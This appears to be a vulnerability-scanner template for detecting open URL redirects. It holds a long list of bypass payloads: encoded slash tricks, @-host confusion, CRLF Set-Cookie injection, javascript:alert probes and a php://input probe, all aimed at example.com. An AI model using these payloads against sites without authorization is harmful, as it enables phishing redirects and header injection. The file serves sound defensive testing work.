id: open-redirect-custom

info:
  name: Open URL redirect detection
  author: osamahamad
  severity: low
  description: A user-controlled input redirects users to an external website.
  tags: redirect,generic

requests:
  - method: GET

    path:
      - '{{BaseURL}}/Ã¯Â½Â°example.com'
      - '{{BaseURL}}/Ã¯Â½Â°example.com'
      - '{{BaseURL}}/%09/example.com'
      - '{{BaseURL}}//%09/example.com'
      - '{{BaseURL}}///%09/example.com'
      - '{{BaseURL}}////%09/example.com'
      - '{{BaseURL}}/%09/example.com'
      - '{{BaseURL}}//%09/example.com'
      - '{{BaseURL}}///%09/example.com'
      - '{{BaseURL}}////%09/example.com'
      - '{{BaseURL}}/%09/javascript:alert(1)'
      - '{{BaseURL}}/%09/javascript:alert(1);'
      - '{{BaseURL}}/%09/{{BaseURL}}@example.com'
      - '{{BaseURL}}//%09/{{BaseURL}}@example.com'
      - '{{BaseURL}}///%09/{{BaseURL}}@example.com'
      - '{{BaseURL}}////%09/{{BaseURL}}@example.com'
      - '{{BaseURL}}/%09/example.com'
      - '{{BaseURL}}/%0a%2eexample.com%2f'
      - '{{BaseURL}}/%0a.example.com/'
      - '{{BaseURL}}/%0d.example.com%2f'
      - '{{BaseURL}}/%2e%5fexample.com%2e%5f'
      - '{{BaseURL}}/%2f%2fexample.com'
      - '{{BaseURL}}/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/'
      - '{{BaseURL}}/%5cexample.com'
      - '{{BaseURL}}//%5cexample.com'
      - '{{BaseURL}}///%5cexample.com'
      - '{{BaseURL}}////%5cexample.com'
      - '{{BaseURL}}/%5cexample.com'
      - '{{BaseURL}}//%5cexample.com'
      - '{{BaseURL}}///%5cexample.com'
      - '{{BaseURL}}////%5cexample.com'
      - '{{BaseURL}}/%5c{{BaseURL}}@example.com'
      - '{{BaseURL}}//%5c{{BaseURL}}@example.com'
      - '{{BaseURL}}///%5c{{BaseURL}}@example.com'
      - '{{BaseURL}}////%5c{{BaseURL}}@example.com'
      - '{{BaseURL}}/cgi-bin/redirect.cgi?example.com'
      - '{{BaseURL}}/%e5%98%8aexample.com'
      - '{{BaseURL}}/.example.com'
      - '{{BaseURL}}/////example.com'
      - '{{BaseURL}}/////example.com/'
      - '{{BaseURL}}////\;@example.com'
      - '{{BaseURL}}////example.com/'
      - '{{BaseURL}}////example.com//'
      - '{{BaseURL}}///\;@example.com'
      - '{{BaseURL}}///example.com'
      - '{{BaseURL}}///example.com/'
      - '{{BaseURL}}///example.com//'
      - '{{BaseURL}}//example.com'
      - '{{BaseURL}}//example.com/'
      - '{{BaseURL}}//example.com//'
      - '{{BaseURL}}/<>//example.com'
      - '{{BaseURL}}/\/\/example.com/'
      - '{{BaseURL}}/\/example.com/'
      - '{{BaseURL}}////example.com/%2e%2e'
      - '{{BaseURL}}///example.com/%2e%2e'
      - '{{BaseURL}}//example.com/%2e%2e'
      - '{{BaseURL}}////example.com/%2e%2e%2f'
      - '{{BaseURL}}///example.com/%2e%2e%2f'
      - '{{BaseURL}}//example.com/%2e%2e%2f'
      - '{{BaseURL}}////example.com/%2f..'
      - '{{BaseURL}}///example.com/%2f..'
      - '{{BaseURL}}//example.com/%2f..'
      - '{{BaseURL}}////example.com/%2f%2e%2e'
      - '{{BaseURL}}///example.com/%2f%2e%2e'
      - '{{BaseURL}}//example.com/%2f%2e%2e'
      - '{{BaseURL}}/example.com/%2f%2e%2e'
      - '{{BaseURL}}/////example.com?url=http://example.com'
      - '{{BaseURL}}/%ff%2Fwww%252egoogle%252ecom'
      - '{{BaseURL}}/%ff%2Fwww%252egoogle%252ecom%252f'
      - '{{BaseURL}}//google%00.com'
      - '{{BaseURL}}////example.com/'
      - '{{BaseURL}}////example.com//'
      - '{{BaseURL}}///example.com/'
      - '{{BaseURL}}///example.com//'
      - '{{BaseURL}}//example.com'
      - '{{BaseURL}}//example.com/'
      - '{{BaseURL}}//example.com//'
      - '{{BaseURL}}/\/example.com/'
      - '{{BaseURL}}<>//example.com'
      - '{{BaseURL}}\/\/example.com/'
      - '{{BaseURL}}\\example.com'
      - '{{BaseURL}}////example.com/%2f..'
      - '{{BaseURL}}///example.com/%2f..'
      - '{{BaseURL}}//example.com/%2f..'
      - '{{BaseURL}}//example.com\@{{BaseURL}}'
      - '{{BaseURL}}//google%E3%80%82com'
      - '{{BaseURL}}<h1\>INJECTX</h1\>'
      - '{{BaseURL}}/http://example.com'
      - '{{BaseURL}}/http:/example.com'
      - '{{BaseURL}}http://[::ffff:216.58.214.206]'
      - '{{BaseURL}}http:[::ffff:216.58.214.206]'
      - '{{BaseURL}}http:///////////example.com'
      - '{{BaseURL}}http://example.com:80#@{{BaseURL}}/'
      - '{{BaseURL}}http://example.com:80?@{{BaseURL}}/'
      - '{{BaseURL}}http://example.com&{{BaseURL}}'
      - '{{BaseURL}}http://example.com\{{BaseURL}}'
      - '{{BaseURL}}/https://%09/example.com'
      - '{{BaseURL}}/https:/%5cexample.com/'
      - '{{BaseURL}}/https://%5cexample.com'
      - '{{BaseURL}}/https://%5cexample.com'
      - '{{BaseURL}}/https://%5c{{BaseURL}}@example.com'
      - '{{BaseURL}}/https://%5c{{BaseURL}}@example.com'
      - '{{BaseURL}}//https://example.com//'
      - '{{BaseURL}}/https://example.com'
      - '{{BaseURL}}/https://example.com/'
      - '{{BaseURL}}/https://example.com//'
      - '{{BaseURL}}/https:example.com'
      - '{{BaseURL}}//https:///example.com/%2e%2e'
      - '{{BaseURL}}/https:///example.com/%2e%2e'
      - '{{BaseURL}}/https://example.com/%2e%2e'
      - '{{BaseURL}}//https://example.com/%2e%2e%2f'
      - '{{BaseURL}}/https://example.com/%2e%2e%2f'
      - '{{BaseURL}}/https://example.com/%2f..'
      - '{{BaseURL}}/https:///example.com/%2f%2e%2e'
      - '{{BaseURL}}/https://example.com/%2f%2e%2e'
      - '{{BaseURL}}//https://example.com//'
      - '{{BaseURL}}/https://example.com/'
      - '{{BaseURL}}/https://example.com'
      - '{{BaseURL}}/https://example.com/'
      - '{{BaseURL}}/https://example.com//'
      - '{{BaseURL}}/https:example.com'
      - '{{BaseURL}}/https://example.com/%2f..'
      - '{{BaseURL}}/https://example.com/%2f..'
      - '{{BaseURL}}/https://:@example.com\@{{BaseURL}}'
      - '{{BaseURL}}//https:///www.example.com/%2e%2e'
      - '{{BaseURL}}/https://www.example.com/%2e%2e'
      - '{{BaseURL}}/https:///www.example.com/%2e%2e'
      - '{{BaseURL}}//https://www.example.com/%2e%2e%2f'
      - '{{BaseURL}}/https://www.example.com/%2e%2e%2f'
      - '{{BaseURL}}/https:///www.example.com/%2f%2e%2e'
      - '{{BaseURL}}/https://www.example.com/%2f%2e%2e'
      - '{{BaseURL}}/https:///www.example.com/%2f%2e%2e'
      - '{{BaseURL}}/https://www.example.com/%2f%2e%2e'
      - '{{BaseURL}}//https://{{BaseURL}}@example.com//'
      - '{{BaseURL}}/https://{{BaseURL}}@example.com/'
      - '{{BaseURL}}/https://{{BaseURL}}@example.com'
      - '{{BaseURL}}/https://{{BaseURL}}@example.com/'
      - '{{BaseURL}}/https://{{BaseURL}}@example.com//'
      - '{{BaseURL}}/https://{{BaseURL}}@example.com/%2f..'
      - '{{BaseURL}}/https://{{BaseURL}}@example.com/%2f..'
      - '{{BaseURL}}/https://{{BaseURL}}/https://www.example.com/'
      - '{{BaseURL}}/https://{{BaseURL}}@www.example.com/%2e%2e'
      - '{{BaseURL}}/https:///{{BaseURL}}@www.example.com/%2e%2e'
      - '{{BaseURL}}//https://{{BaseURL}}@www.example.com/%2e%2e%2f'
      - '{{BaseURL}}/https://{{BaseURL}}@www.example.com/%2e%2e%2f'
      - '{{BaseURL}}/https:///{{BaseURL}}@www.example.com/%2f%2e%2e'
      - '{{BaseURL}}/https://{{BaseURL}}@www.example.com/%2f%2e%2e'
      - '{{BaseURL}}/https:///{{BaseURL}}@www.example.com/%2f%2e%2e'
      - '{{BaseURL}}/https://{{BaseURL}}@www.example.com/%2f%2e%2e'
      - '{{BaseURL}}/https://www.example.com/'
      - '{{BaseURL}}/http://{{BaseURL}}@example.com'
      - '{{BaseURL}}/http://{{BaseURL}}.example.com'
      - '{{BaseURL}}/http://example.com'
      - '{{BaseURL}}/http://example.com/.testing/redirect_vuln.txt%00'
      - '{{BaseURL}}/javascript:document.location=http://example.com'
      - '{{BaseURL}}/javascript://{{BaseURL}}?%a0alert%281%29'
      - '{{BaseURL}}/login?to=///example.com'
      - '{{BaseURL}}/login?to=//example.com'
      - '{{BaseURL}}/login?to=/\example.com'
      - '{{BaseURL}}/login?to=/example.com'
      - '{{BaseURL}}/login?to=example.com'
      - '{{BaseURL}}/?next=$2f%2fexample.com'
      - '{{BaseURL}}/?next=https://example.com'
      - '{{BaseURL}}/?next=http://example.com'
      - '{{BaseURL}}/?next=//example.com'
      - '{{BaseURL}}/out/example.com'
      - '{{BaseURL}}/out?///example.com'
      - '{{BaseURL}}/out?//example.com'
      - '{{BaseURL}}/out?/\example.com'
      - '{{BaseURL}}/out?/example.com'
      - '{{BaseURL}}/out?example.com'
      - '{{BaseURL}}php://input'
      - '{{BaseURL}}php://input;base64,SmJhdHk4Y1dIbFJhemh6Q3lqQTw%2FcGhwIGVjaG8gJ1Z1bG5lcmFibGUnOyA%2FPkpiYXR5OGNXSGxSYXpoekN5akE='
      - '{{BaseURL}}/redirect/example.com'
      - '{{BaseURL}}/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com'
      - '{{BaseURL}}/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com'
      - '{{BaseURL}}/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com'
      - '{{BaseURL}}/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com'
      - '{{BaseURL}}/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com'
      - '{{BaseURL}}/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com'
      - '{{BaseURL}}?url=$2f%2fexample.com'
      - '{{BaseURL}}/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com'
      - '{{BaseURL}}/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com'
      - '{{BaseURL}}/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com'
      - '{{BaseURL}}/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com'
      - '{{BaseURL}}/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com'
      - '{{BaseURL}}/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com'
      - '{{BaseURL}}////www.example.com/%2e%2e'
      - '{{BaseURL}}///www.example.com/%2e%2e'
      - '{{BaseURL}}////www.example.com/%2e%2e%2f'
      - '{{BaseURL}}///www.example.com/%2e%2e%2f'
      - '{{BaseURL}}//www.example.com/%2e%2e%2f'
      - '{{BaseURL}}////www.example.com/%2f%2e%2e'
      - '{{BaseURL}}///www.example.com/%2f%2e%2e'
      - '{{BaseURL}}//www.example.com/%2f%2e%2e'
      - '{{BaseURL}}////{{BaseURL}}@example.com/'
      - '{{BaseURL}}////{{BaseURL}}@example.com//'
      - '{{BaseURL}}///{{BaseURL}}@example.com/'
      - '{{BaseURL}}///{{BaseURL}}@example.com//'
      - '{{BaseURL}}//{{BaseURL}}@example.com/'
      - '{{BaseURL}}//{{BaseURL}}@example.com//'
      - '{{BaseURL}}////{{BaseURL}}@example.com/%2f..'
      - '{{BaseURL}}///{{BaseURL}}@example.com/%2f..'
      - '{{BaseURL}}//{{BaseURL}}@example.com/%2f..'
      - '{{BaseURL}}//{{BaseURL}}@https:///www.example.com/%2e%2e'
      - '{{BaseURL}}////{{BaseURL}}@www.example.com/%2e%2e'
      - '{{BaseURL}}///{{BaseURL}}@www.example.com/%2e%2e'
      - '{{BaseURL}}////{{BaseURL}}@www.example.com/%2e%2e%2f'
      - '{{BaseURL}}///{{BaseURL}}@www.example.com/%2e%2e%2f'
      - '{{BaseURL}}//{{BaseURL}}@www.example.com/%2e%2e%2f'
      - '{{BaseURL}}////{{BaseURL}}@www.example.com/%2f%2e%2e'
      - '{{BaseURL}}///{{BaseURL}}@www.example.com/%2f%2e%2e'
      - '{{BaseURL}}//{{BaseURL}}@www.example.com/%2f%2e%2e'
      - '{{BaseURL}}//www.example.com/'
      - '{{BaseURL}}\/www.example.com/'
      - '{{BaseURL}}www.example.com/'
      - '{{BaseURL}}//////www.example.com/%2e%2e/'
      - '{{BaseURL}}/\www.example.com/%2e%2e/'
      - '{{BaseURL}}\/www.example.com/%2e%2e/'
      - '{{BaseURL}}//www.example.com/%2E%2E'
      - '{{BaseURL}}/www.example.com/%2E%2E'
      - '{{BaseURL}}//www.example.com/%2E%2E%0aSet-Cookie: INJECTX=INJECTX'
      - '{{BaseURL}}//www.example.com/%2E%2E%0aSet-Cookie: x=INJECTX'
      - '{{BaseURL}}//www.example.com/%2E%2E%0d%0a%20Set-Cookie: INJECTX=INJECTX'
      - '{{BaseURL}}//www.example.com/%2E%2E%0d%0a%20Set-Cookie: x=INJECTX'
      - '{{BaseURL}}//www.example.com/%2E%2E%0dSet-Cookie: INJECTX=INJECTX'
      - '{{BaseURL}}//www.example.com/%2E%2E%0dSet-Cookie: x=INJECTX'
      - '{{BaseURL}}//////www.example.com/%2e%2e/tr'
      - '{{BaseURL}}\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)'
      - '{{BaseURL}}.example.com'
      - '{{BaseURL}}//example.com'
      - '{{BaseURL}}/\/\example.com'
      - '{{BaseURL}}/\example.com'
      - '{{BaseURL}}/example.com'
      - '{{BaseURL}}\/\/example.com'
      - '{{BaseURL}}\/example.com'
      - '{{BaseURL}}\\example.com'
      - '{{BaseURL}}|/example.com'
      - '{{BaseURL}}example.com'
      - '{{BaseURL}}//example.com/.testing'

    threads: 100
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
        part: header

      - type: status
        status:
          - 302
          - 301

